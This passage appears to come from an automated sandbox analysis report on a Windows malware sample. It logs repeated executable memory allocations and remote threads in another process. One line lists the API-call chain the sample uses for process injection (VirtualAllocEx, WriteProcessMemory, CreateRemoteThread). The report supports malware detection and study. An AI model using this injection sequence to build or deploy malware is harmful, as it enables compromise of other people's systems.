        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BA0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11D0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11E0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 4E0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 4F0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1040000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1050000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5D0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5E0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1350000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1360000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 600000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 610000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 190000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5B0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: E00000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: E10000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 820000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 830000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F40000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F50000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F00000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F50000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1140000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1150000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BE0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BF0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 560000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 570000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 13F0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1400000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A10000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A20000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EE0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EF0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F00000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F10000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1110000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1120000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: D00000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: D10000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 3B0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 3C0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 930000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 940000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 9F0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A00000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 780000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 780000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AC0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: B10000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 820000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1550000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 15A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: ED0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EE0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11D0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11E0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: DA0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: DB0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1250000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1260000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BC0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BD0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1280000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12D0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 900000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_01441EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,1_2_01441EF6
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 7B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 7C0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 12B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 12C0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 790000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 7A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: A20000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: A30000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: AD0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: AE0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: B90000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: BA0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 11D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 11E0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 4E0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 4F0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 1040000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 1050000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 5D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 5E0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 1350000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 1360000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 7C0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 7D0000
